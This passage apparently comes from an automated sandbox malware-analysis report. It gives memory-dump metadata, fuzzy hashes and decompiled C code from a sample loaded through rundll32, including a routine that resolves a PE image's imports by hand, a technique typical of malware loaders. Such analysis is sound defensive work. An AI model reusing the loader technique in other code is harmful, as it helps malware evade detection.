                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 344208780-0
                                                                      • Opcode ID: cb4438306000f579200a4e3faaeed5baa994eee9722b598902c92a8ad090686c
                                                                      • Instruction ID: 91f20163bf94ffc314fcb9aa9c748149020831180617c4e9d53ffcf8f46dcf70
                                                                      • Opcode Fuzzy Hash: cb4438306000f579200a4e3faaeed5baa994eee9722b598902c92a8ad090686c
                                                                      • Instruction Fuzzy Hash: 9C21FDB5900218BFDB00DFA5CC88DAFBBBDEF89758B1045AAF505E7250D675AE01CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$\u%04X$\u%04X\u%04X
                                                                      • API String ID: 0-2132903582
                                                                      • Opcode ID: 79d35d2da01486359e99486d8a111a28fd57f82cc0967fae1c5b288eecedaf17
                                                                      • Instruction ID: 8ee92259bba25ce0aa969ee98ae9254229e784cc1c021180fd8c786167a417ff
                                                                      • Opcode Fuzzy Hash: 79d35d2da01486359e99486d8a111a28fd57f82cc0967fae1c5b288eecedaf17
                                                                      • Instruction Fuzzy Hash: 17410431700205A7EB28DF69AC89BBE3A59DF44B14F3405B5FD02E6274E271F9908F92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E04953BFE(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                      				signed int _t12;
                                                                      				signed int _t13;
                                                                      				signed int _t23;
                                                                      				void* _t30;
                                                                      				char* _t31;
                                                                      				char* _t33;
                                                                      				char* _t35;
                                                                      				char* _t37;
                                                                      				char* _t38;
                                                                      				long long* _t40;
                                                                      
                                                                      				_t30 = __edi;
                                                                      				_t12 = _a20;
                                                                      				if(_t12 == 0) {
                                                                      					_t12 = 0x11;
                                                                      				}
                                                                      				_t35 = _a4;
                                                                      				_push(_t25);
                                                                      				 *_t40 = _a12;
                                                                      				_push(_t12);
                                                                      				_push("%.*g");
                                                                      				_push(_a8);
                                                                      				_push(_t35);
                                                                      				L04953D57();
                                                                      				_t23 = _t12;
                                                                      				if(_t23 < 0 || _t23 >= _a8) {
                                                                      					L16:
                                                                      					_t13 = _t12 | 0xffffffff;
                                                                      					goto L17;
                                                                      				} else {
                                                                      					E04953BD7(_t12, _t35);
                                                                      					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                      						L8:
                                                                      						_push(_t30);
                                                                      						_t37 = strchr(_t35, 0x65);
                                                                      						_t31 = _t37;
                                                                      						if(_t37 == 0) {
                                                                      							L15:
                                                                      							_t13 = _t23;
                                                                      							L17:
                                                                      							return _t13;
                                                                      						}
                                                                      						_t38 = _t37 + 1;
                                                                      						_t33 = _t31 + 2;
                                                                      						if( *_t38 == 0x2d) {
                                                                      							_t38 = _t33;
                                                                      						}
                                                                      						while( *_t33 == 0x30) {
                                                                      							_t33 = _t33 + 1;
                                                                      						}
                                                                      						if(_t33 != _t38) {
                                                                      							E04949227(_t38, _t33, _t23 - _t33 + _a4);
                                                                      							_t23 = _t23 + _t38 - _t33;
                                                                      						}
                                                                      						goto L15;
                                                                      					} else {
                                                                      						_t6 = _t23 + 3; // 0x49523e9
                                                                      						_t12 = _t6;
                                                                      						if(_t12 >= _a8) {
                                                                      							goto L16;
                                                                      						}
                                                                      						_t35[_t23] = 0x302e;
                                                                      						( &(_t35[2]))[_t23] = 0;
                                                                      						_t23 = _t23 + 2;
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}














                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strchr$_snprintf
                                                                      • String ID: %.*g
                                                                      • API String ID: 3619936089-952554281
                                                                      • Opcode ID: 096e2f23bf719e4d311d682c73e5a2bb93945815ad39b38c18f69218a1948f64
                                                                      • Instruction ID: 0a434c3e2f4fc1d4e1a05d58e0ba026dedb3c859586a2968ab87867384001522
                                                                      • Opcode Fuzzy Hash: 096e2f23bf719e4d311d682c73e5a2bb93945815ad39b38c18f69218a1948f64
                                                                      • Instruction Fuzzy Hash: 2A21273260065526E731DE68DC85FAB37AC9F417A8F394539FC45C62A0E7A0B96443D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E04953D9F(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                      				intOrPtr* _v8;
                                                                      				signed int* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				intOrPtr _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v44;
                                                                      				struct HINSTANCE__* _v48;
                                                                      				intOrPtr _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				signed int _t109;
                                                                      				signed int _t112;
                                                                      				signed int _t115;
                                                                      				void* _t163;
                                                                      				void* _t167;
                                                                      
                                                                      				_t167 = __ecx;
                                                                      				_v44 = _v44 & 0x00000000;
                                                                      				if(_a4 != 0) {
                                                                      					_v48 = GetModuleHandleA("kernel32.dll");
                                                                      					_v40 = E049493DC(_t167, _v48, "GetProcAddress");
                                                                      					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                      					_v32 = _v52;
                                                                      					_t109 = 8;
                                                                      					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                      						L24:
                                                                      						return 0;
                                                                      					}
                                                                      					_v56 = 0x80000000;
                                                                      					_t112 = 8;
                                                                      					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                      					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                      						_v8 = _v8 + 0x14;
                                                                      					}
                                                                      					_t115 = 8;
                                                                      					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                      					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                      						_t34 = _v8 + 0xc; // 0xffff
                                                                      						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                      						if(_v36 != 0) {
                                                                      							if( *_v8 == 0) {
                                                                      								_t43 = _v8 + 0x10; // 0xb8
                                                                      								_v12 =  *_t43 + _a4;
                                                                      							} else {
                                                                      								_v12 =  *_v8 + _a4;
                                                                      							}
                                                                      							_v28 = _v28 & 0x00000000;
                                                                      							while( *_v12 != 0) {
                                                                      								_v24 = _v24 & 0x00000000;
                                                                      								_v16 = _v16 & 0x00000000;
                                                                      								_v64 = _v64 & 0x00000000;
                                                                      								_v20 = _v20 & 0x00000000;
                                                                      								if(( *_v12 & _v56) == 0) {
                                                                      									_v60 =  *_v12 + _a4;
                                                                      									_v20 = _v60 + 2;
                                                                      									_t73 = _v8 + 0x10; // 0xb8
                                                                      									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                      									_v16 = _v40(_v36, _v20);
                                                                      								} else {
                                                                      									_v24 =  *_v12;
                                                                      									_v20 = _v24 & 0x0000ffff;
                                                                      									_v16 = _v40(_v36, _v20);
                                                                      								}
                                                                      								if(_v24 != _v16) {
                                                                      									_v44 = _v44 + 1;
                                                                      									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                      										 *_v12 = _v16;
                                                                      									} else {
                                                                      										_t89 = _v8 + 0x10; // 0xb8
                                                                      										 *( *_t89 + _a4 + _v28) = _v16;
                                                                      									}
                                                                      								}
                                                                      								_v12 =  &(_v12[1]);
                                                                      								_v28 = _v28 + 4;
                                                                      							}
                                                                      							_v8 = _v8 + 0x14;
                                                                      							continue;
                                                                      						}
                                                                      						_t163 = 0xfffffffd;
                                                                      						return _t163;
                                                                      					}
                                                                      					goto L24;
                                                                      				}
                                                                      				return __eax | 0xffffffff;
                                                                      			}

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 04953DBC
                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 04953E55
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLibraryLoadModule
                                                                      • String ID: GetProcAddress$kernel32.dll
                                                                      • API String ID: 4133054770-1584408056
                                                                      • Opcode ID: 7428f6727e5aa05bb5a7cedc9566573ce5ed36b17a41079d16b83db73ea7d66a
                                                                      • Instruction ID: 9c986b6540944e2436c3550910111cc6ea15f3267915421eee9b5dec08e7048c
                                                                      • Opcode Fuzzy Hash: 7428f6727e5aa05bb5a7cedc9566573ce5ed36b17a41079d16b83db73ea7d66a
                                                                      • Instruction Fuzzy Hash: 7461AD75E00209EFDB10CF98D485BADBBF1FF08355F2485A9E815AB2A1D334AA84DF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 99%
                                                                      			E04954BF0(int _a4, signed int _a8) {
                                                                      				int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				void* __esi;
                                                                      				void* _t137;
                                                                      				signed int _t141;
                                                                      				intOrPtr* _t142;
                                                                      				signed int _t145;
                                                                      				signed int _t146;
                                                                      				intOrPtr _t151;
                                                                      				intOrPtr _t161;
                                                                      				intOrPtr _t162;
                                                                      				intOrPtr _t167;
                                                                      				intOrPtr _t170;
                                                                      				signed int _t172;
                                                                      				intOrPtr _t173;
                                                                      				int _t184;
                                                                      				intOrPtr _t185;
                                                                      				intOrPtr _t188;
                                                                      				signed int _t189;
                                                                      				void* _t195;
                                                                      				int _t202;
                                                                      				int _t208;
                                                                      				intOrPtr _t217;
                                                                      				signed int _t218;
                                                                      				int _t219;
                                                                      				intOrPtr _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t222;
                                                                      				int _t224;
                                                                      				int _t225;
                                                                      				signed int _t227;
                                                                      				intOrPtr _t228;
                                                                      				int _t232;
                                                                      				int _t234;
                                                                      				signed int _t235;
                                                                      				int _t239;
                                                                      				void* _t240;
                                                                      				int _t245;
                                                                      				int _t252;
                                                                      				signed int _t253;
                                                                      				int _t254;
                                                                      				void* _t257;
                                                                      				void* _t258;
                                                                      				int _t259;
                                                                      				intOrPtr _t260;
                                                                      				int _t261;
                                                                      				signed int _t269;
                                                                      				signed int _t271;
                                                                      				intOrPtr* _t272;
                                                                      				void* _t273;
                                                                      
                                                                      				_t253 = _a8;
                                                                      				_t272 = _a4;
                                                                      				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                      				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                      				_t228 =  *_t4;
                                                                      				_t137 =  *_t3 + 0xfffffffb;
                                                                      				_t229 =  <=  ? _t137 : _t228;
                                                                      				_v16 =  <=  ? _t137 : _t228;
                                                                      				_t269 = 0;
                                                                      				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                      				asm("o16 nop [eax+eax]");
                                                                      				while(1) {
                                                                      					_t8 = _t272 + 0x16bc; // 0x40f8458b
                                                                      					_t141 =  *_t8 + 0x2a >> 3;
                                                                      					_v12 = 0xffff;
                                                                      					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                      					if(_t217 < _t141) {
                                                                      						break;
                                                                      					}
                                                                      					_t11 = _t272 + 0x6c; // 0x960fd8a1
                                                                      					_t12 = _t272 + 0x5c; // 0x54e85000
                                                                      					_t245 =  *_t11 -  *_t12;
                                                                      					_v8 = _t245;
                                                                      					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                      					_t247 =  <  ? _t195 : _v12;
                                                                      					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                      					if(_t227 >= _v16) {
                                                                      						L7:
                                                                      						if(_t253 != 4) {
                                                                      							L10:
                                                                      							_t269 = 0;
                                                                      							__eflags = 0;
                                                                      						} else {
                                                                      							_t285 = _t227 - _t195;
                                                                      							if(_t227 != _t195) {
                                                                      								goto L10;
                                                                      							} else {
                                                                      								_t269 = _t253 - 3;
                                                                      							}
                                                                      						}
                                                                      						E04957C10(_t272, _t272, 0, 0, _t269);
                                                                      						_t18 = _t272 + 0x14; // 0xc703f045
                                                                      						_t19 = _t272 + 8; // 0x8d000040
                                                                      						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                      						_t22 = _t272 + 0x14; // 0xc703f045
                                                                      						_t23 = _t272 + 8; // 0x8d000040
                                                                      						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                      						_t26 = _t272 + 0x14; // 0xc703f045
                                                                      						_t27 = _t272 + 8; // 0x8d000040
                                                                      						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                      						_t30 = _t272 + 0x14; // 0xc703f045
                                                                      						_t31 = _t272 + 8; // 0x8d000040
                                                                      						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                      						E04956970(_t285,  *_t272);
                                                                      						_t202 = _v8;
                                                                      						_t273 = _t273 + 0x14;
                                                                      						if(_t202 != 0) {
                                                                      							_t208 =  >  ? _t227 : _t202;
                                                                      							_v8 = _t208;
                                                                      							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                      							_t37 = _t272 + 0x5c; // 0x54e85000
                                                                      							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                      							_t273 = _t273 + 0xc;
                                                                      							_t252 = _v8;
                                                                      							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                      							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                      							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                      							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                      							_t227 = _t227 - _t252;
                                                                      						}
                                                                      						if(_t227 != 0) {
                                                                      							E04956AB0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                      							_t273 = _t273 + 0xc;
                                                                      							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                      							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                      							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                      						}
                                                                      						_t253 = _a8;
                                                                      						if(_t269 == 0) {
                                                                      							continue;
                                                                      						}
                                                                      					} else {
                                                                      						if(_t227 != 0 || _t253 == 4) {
                                                                      							if(_t253 != 0 && _t227 == _t195) {
                                                                      								goto L7;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				_t142 =  *_t272;
                                                                      				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                      				_a4 = _t232;
                                                                      				if(_t232 == 0) {
                                                                      					_t83 = _t272 + 0x6c; // 0x960fd8a1
                                                                      					_t254 =  *_t83;
                                                                      				} else {
                                                                      					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                      					_t224 =  *_t59;
                                                                      					if(_t232 < _t224) {
                                                                      						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                      						_t66 = _t272 + 0x6c; // 0x960fd8a1
                                                                      						_t260 =  *_t66;
                                                                      						__eflags =  *_t65 - _t260 - _t232;
                                                                      						if( *_t65 - _t260 <= _t232) {
                                                                      							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                      							_t261 = _t260 - _t224;
                                                                      							 *(_t272 + 0x6c) = _t261;
                                                                      							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                      							_t70 = _t272 + 0x16b0; // 0x1488087d
                                                                      							_t188 =  *_t70;
                                                                      							_t273 = _t273 + 0xc;
                                                                      							_t232 = _a4;
                                                                      							__eflags = _t188 - 2;
                                                                      							if(_t188 < 2) {
                                                                      								_t189 = _t188 + 1;
                                                                      								__eflags = _t189;
                                                                      								 *(_t272 + 0x16b0) = _t189;
                                                                      							}
                                                                      						}
                                                                      						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                      						_t74 = _t272 + 0x6c; // 0x960fd8a1
                                                                      						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                      						_t225 = _a4;
                                                                      						_t273 = _t273 + 0xc;
                                                                      						_t76 = _t272 + 0x6c;
                                                                      						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                      						__eflags =  *_t76;
                                                                      						_t78 = _t272 + 0x6c; // 0x960fd8a1
                                                                      						_t184 =  *_t78;
                                                                      						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                      						_t239 =  *_t79;
                                                                      					} else {
                                                                      						 *(_t272 + 0x16b0) = 2;
                                                                      						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                      						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                      						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                      						_t184 =  *_t62;
                                                                      						_t273 = _t273 + 0xc;
                                                                      						_t225 = _a4;
                                                                      						_t239 = _t184;
                                                                      						 *(_t272 + 0x6c) = _t184;
                                                                      					}
                                                                      					_t254 = _t184;
                                                                      					 *(_t272 + 0x5c) = _t184;
                                                                      					_t81 = _t272 + 0x16b4; // 0xff4d8a39
                                                                      					_t185 =  *_t81;
                                                                      					_t240 = _t239 - _t185;
                                                                      					_t241 =  <=  ? _t225 : _t240;
                                                                      					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                      					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                      				}
                                                                      				if( *(_t272 + 0x16c0) < _t254) {
                                                                      					 *(_t272 + 0x16c0) = _t254;
                                                                      				}
                                                                      				if(_t269 == 0) {
                                                                      					_t218 = _a8;
                                                                      					__eflags = _t218;
                                                                      					if(_t218 == 0) {
                                                                      						L34:
                                                                      						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                      						_t219 =  *_t272;
                                                                      						_t145 =  *_t89 - _t254 - 1;
                                                                      						_a4 =  *_t272;
                                                                      						_t234 = _t254;
                                                                      						_v16 = _t145;
                                                                      						_v8 = _t254;
                                                                      						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                      						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                      							_v8 = _t254;
                                                                      							_t95 = _t272 + 0x5c; // 0x54e85000
                                                                      							_a4 = _t219;
                                                                      							_t234 = _t254;
                                                                      							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                      							__eflags =  *_t95 -  *_t97;
                                                                      							if( *_t95 >=  *_t97) {
                                                                      								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                      								_t167 =  *_t98;
                                                                      								_t259 = _t254 - _t167;
                                                                      								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                      								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                      								 *(_t272 + 0x6c) = _t259;
                                                                      								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                      								_t103 = _t272 + 0x16b0; // 0x1488087d
                                                                      								_t170 =  *_t103;
                                                                      								_t273 = _t273 + 0xc;
                                                                      								__eflags = _t170 - 2;
                                                                      								if(_t170 < 2) {
                                                                      									_t172 = _t170 + 1;
                                                                      									__eflags = _t172;
                                                                      									 *(_t272 + 0x16b0) = _t172;
                                                                      								}
                                                                      								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                      								_t145 = _v16 +  *_t106;
                                                                      								__eflags = _t145;
                                                                      								_a4 =  *_t272;
                                                                      								_t108 = _t272 + 0x6c; // 0x960fd8a1
                                                                      								_t234 =  *_t108;
                                                                      								_v8 = _t234;
                                                                      							}
                                                                      						}
                                                                      						_t255 = _a4;
                                                                      						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                      						__eflags = _t145 - _t220;
                                                                      						_t221 =  <=  ? _t145 : _t220;
                                                                      						_t146 = _t221;
                                                                      						_a4 = _t221;
                                                                      						_t222 = _a8;
                                                                      						__eflags = _t146;
                                                                      						if(_t146 != 0) {
                                                                      							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                      							E04956AB0(_t255,  *_t114 + _v8, _t146);
                                                                      							_t273 = _t273 + 0xc;
                                                                      							_t117 = _t272 + 0x6c;
                                                                      							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                      							__eflags =  *_t117;
                                                                      							_t119 = _t272 + 0x6c; // 0x960fd8a1
                                                                      							_t234 =  *_t119;
                                                                      						}
                                                                      						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                      						if( *(_t272 + 0x16c0) < _t234) {
                                                                      							 *(_t272 + 0x16c0) = _t234;
                                                                      						}
                                                                      						_t122 = _t272 + 0x16bc; // 0x40f8458b
                                                                      						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                      						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                      						__eflags = _t257 - 0xffff;
                                                                      						_t258 =  >  ? 0xffff : _t257;
                                                                      						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                      						_t151 =  *_t124;
                                                                      						_t125 = _t272 + 0x5c; // 0x54e85000
                                                                      						_t235 = _t234 -  *_t125;
                                                                      						__eflags = _t258 - _t151;
                                                                      						_t152 =  <=  ? _t258 : _t151;
                                                                      						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                      						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                      							L49:
                                                                      							__eflags = _t235 - _t258;
                                                                      							_t154 =  >  ? _t258 : _t235;
                                                                      							_a4 =  >  ? _t258 : _t235;
                                                                      							__eflags = _t222 - 4;
                                                                      							if(_t222 != 4) {
                                                                      								L53:
                                                                      								_t269 = 0;
                                                                      								__eflags = 0;
                                                                      							} else {
                                                                      								_t161 =  *_t272;
                                                                      								__eflags =  *(_t161 + 4);
                                                                      								_t154 = _a4;
                                                                      								if( *(_t161 + 4) != 0) {
                                                                      									goto L53;
                                                                      								} else {
                                                                      									__eflags = _t154 - _t235;
                                                                      									if(_t154 != _t235) {
                                                                      										goto L53;
                                                                      									} else {
                                                                      										_t269 = _t222 - 3;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                      							_t132 = _t272 + 0x5c; // 0x54e85000
                                                                      							E04957C10(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                      							_t134 = _t272 + 0x5c;
                                                                      							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                      							__eflags =  *_t134;
                                                                      							E04956970( *_t134,  *_t272);
                                                                      						} else {
                                                                      							__eflags = _t235;
                                                                      							if(_t235 != 0) {
                                                                      								L46:
                                                                      								__eflags = _t222;
                                                                      								if(_t222 != 0) {
                                                                      									_t162 =  *_t272;
                                                                      									__eflags =  *(_t162 + 4);
                                                                      									if( *(_t162 + 4) == 0) {
                                                                      										__eflags = _t235 - _t258;
                                                                      										if(_t235 <= _t258) {
                                                                      											goto L49;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = _t222 - 4;
                                                                      								if(_t222 == 4) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						asm("sbb edi, edi");
                                                                      						_t271 =  ~_t269 & 0x00000002;
                                                                      						__eflags = _t271;
                                                                      						return _t271;
                                                                      					} else {
                                                                      						__eflags = _t218 - 4;
                                                                      						if(_t218 == 4) {
                                                                      							goto L34;
                                                                      						} else {
                                                                      							_t173 =  *_t272;
                                                                      							__eflags =  *(_t173 + 4);
                                                                      							if( *(_t173 + 4) != 0) {
                                                                      								goto L34;
                                                                      							} else {
                                                                      								_t88 = _t272 + 0x5c; // 0x54e85000
                                                                      								__eflags = _t254 -  *_t88;
                                                                      								if(_t254 !=  *_t88) {
                                                                      									goto L34;
                                                                      								} else {
                                                                      									return 1;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					return 3;
                                                                      				}
                                                                      			}

                                                                      0x04954ddd
                                                                      0x04954de0
                                                                      0x04954de0
                                                                      0x04954d61
                                                                      0x04954d61
                                                                      0x04954d71
                                                                      0x04954d74
                                                                      0x04954d79
                                                                      0x04954d79
                                                                      0x04954d7c
                                                                      0x04954d7f
                                                                      0x04954d82
                                                                      0x04954d84
                                                                      0x04954d84
                                                                      0x04954de3
                                                                      0x04954de5
                                                                      0x04954de8
                                                                      0x04954de8
                                                                      0x04954dee
                                                                      0x04954df2
                                                                      0x04954df5
                                                                      0x04954df7
                                                                      0x04954df7
                                                                      0x04954e08
                                                                      0x04954e0a
                                                                      0x04954e0a
                                                                      0x04954e12
                                                                      0x04954e20
                                                                      0x04954e23
                                                                      0x04954e25
                                                                      0x04954e45
                                                                      0x04954e45
                                                                      0x04954e48
                                                                      0x04954e4e
                                                                      0x04954e4f
                                                                      0x04954e52
                                                                      0x04954e54
                                                                      0x04954e57
                                                                      0x04954e5a
                                                                      0x04954e5d
                                                                      0x04954e61
                                                                      0x04954e64
                                                                      0x04954e67
                                                                      0x04954e6a
                                                                      0x04954e6c
                                                                      0x04954e6c
                                                                      0x04954e6f
                                                                      0x04954e71
                                                                      0x04954e71
                                                                      0x04954e74
                                                                      0x04954e76
                                                                      0x04954e79
                                                                      0x04954e81
                                                                      0x04954e84
                                                                      0x04954e89
                                                                      0x04954e89
                                                                      0x04954e8f
                                                                      0x04954e92
                                                                      0x04954e95
                                                                      0x04954e97
                                                                      0x04954e97
                                                                      0x04954e98
                                                                      0x04954e98
                                                                      0x04954ea3
                                                                      0x04954ea3
                                                                      0x04954ea3
                                                                      0x04954ea6
                                                                      0x04954ea9
                                                                      0x04954ea9
                                                                      0x04954eac
                                                                      0x04954eac
                                                                      0x04954e6f
                                                                      0x04954eaf
                                                                      0x04954eb2
                                                                      0x04954eb5
                                                                      0x04954eb7
                                                                      0x04954eba
                                                                      0x04954ebc
                                                                      0x04954ebf
                                                                      0x04954ec2
                                                                      0x04954ec4
                                                                      0x04954ec7
                                                                      0x04954ecf
                                                                      0x04954ed7
                                                                      0x04954eda
                                                                      0x04954eda
                                                                      0x04954eda
                                                                      0x04954edd
                                                                      0x04954edd
                                                                      0x04954edd
                                                                      0x04954ee0
                                                                      0x04954ee6
                                                                      0x04954ee8
                                                                      0x04954ee8
                                                                      0x04954eee
                                                                      0x04954ef4
                                                                      0x04954efd
                                                                      0x04954f04
                                                                      0x04954f06
                                                                      0x04954f09
                                                                      0x04954f09
                                                                      0x04954f0c
                                                                      0x04954f0c
                                                                      0x04954f0f
                                                                      0x04954f11
                                                                      0x04954f14
                                                                      0x04954f16
                                                                      0x04954f31
                                                                      0x04954f31
                                                                      0x04954f35
                                                                      0x04954f38
                                                                      0x04954f3b
                                                                      0x04954f3e
                                                                      0x04954f54
                                                                      0x04954f54
                                                                      0x04954f54
                                                                      0x04954f40
                                                                      0x04954f40
                                                                      0x04954f42
                                                                      0x04954f46
                                                                      0x04954f49
                                                                      0x00000000
                                                                      0x04954f4b
                                                                      0x04954f4b
                                                                      0x04954f4d
                                                                      0x00000000
                                                                      0x04954f4f
                                                                      0x04954f4f
                                                                      0x04954f4f
                                                                      0x04954f4d
                                                                      0x04954f49
                                                                      0x04954f58
                                                                      0x04954f5b
                                                                      0x04954f60
                                                                      0x04954f6a
                                                                      0x04954f6a
                                                                      0x04954f6a
                                                                      0x04954f6d
